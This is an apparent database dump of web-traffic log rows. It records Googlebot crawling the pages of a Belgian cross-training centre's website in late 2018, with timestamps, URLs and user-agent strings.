(78200, 1539289307.043154, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78201, 1539547462.208249, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78202, 1539578096.566663, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78203, 1539617875.954518, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78204, 1539639573.511650, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78205, 1539639574.166427, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78206, 1539689252.460478, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78207, 1539882580.391944, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78208, 1539882580.884663, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78209, 1539935227.483988, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78210, 1539982214.122340, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78211, 1539982215.138941, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78212, 1540029268.542405, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78213, 1540113562.584183, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78214, 1540113563.086477, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78215, 1540155129.982504, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78216, 1540200770.493738, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78217, 1540200770.993136, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78218, 1540239374.510289, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78219, 1540283970.723759, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78220, 1540560838.350459, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78221, 1540560838.891294, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78222, 1540592192.022717, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78223, 1540627875.135205, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78224, 1540660970.602671, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78225, 1540660971.097932, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78226, 1540660971.656713, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78227, 1540699609.305150, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78228, 1540742945.185630, 1123631525, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78229, 1540788198.498033, 1123631525, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78230, 1540788199.000364, 1123631525, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78231, 1540823249.074977, 1123631525, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78232, 1540857268.551662, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78233, 1540857269.370808, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78234, 1540857305.642909, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78235, 1540857381.924028, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78236, 1540857429.347204, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78237, 1540857507.531383, 1123631752, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78238, 1540885671.667913, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78239, 1541163708.931583, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78240, 1541163709.465513, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78241, 1541198065.773860, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78242, 1541237428.298338, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78243, 1541263258.264293, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78244, 1541263258.829522, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78245, 1541298627.505238, 1123631173, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/jtndmlcpuygmpn.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78246, 1541302134.875956, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78247, 1541303935.946756, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78248, 1541307577.590811, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78249, 1541311193.934735, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78250, 1541529600.005582, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78251, 1541529600.499869, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78252, 1541602329.706534, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78253, 1541750129.210491, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78254, 1541750129.749104, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78255, 1541780995.482198, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78256, 1541782745.325772, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78257, 1541782749.669061, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78258, 1541782982.260715, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78259, 1541787521.418861, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78260, 1541814234.830415, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78261, 1541834749.109245, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78262, 1541850475.670151, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78263, 1541850476.190620, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78264, 1541884880.050871, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78265, 1541934907.855713, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78266, 1542285360.358570, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78267, 1542285360.929775, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78268, 1542378756.100592, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78269, 1542378756.612295, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78270, 1542427553.919726, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78271, 1542638267.631140, 1123632581, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78272, 1542638268.269384, 1123632581, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/koscnkklpz.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78273, 1542669431.100906, 1123632581, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78274, 1542722668.705305, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78275, 1542953126.250068, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78276, 1542953126.776952, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78277, 1543038707.719214, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78278, 1543039896.566832, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78279, 1543039896.579443, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78280, 1543080126.220337, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78281, 1543083124.104955, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78282, 1543109610.195857, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78283, 1543125923.402006, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78284, 1543126337.473040, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78285, 1543126375.894483, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78286, 1543126398.163048, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78287, 1543133813.885698, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78288, 1543135620.162910, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78289, 1543144691.989266, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78290, 1543160005.388493, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
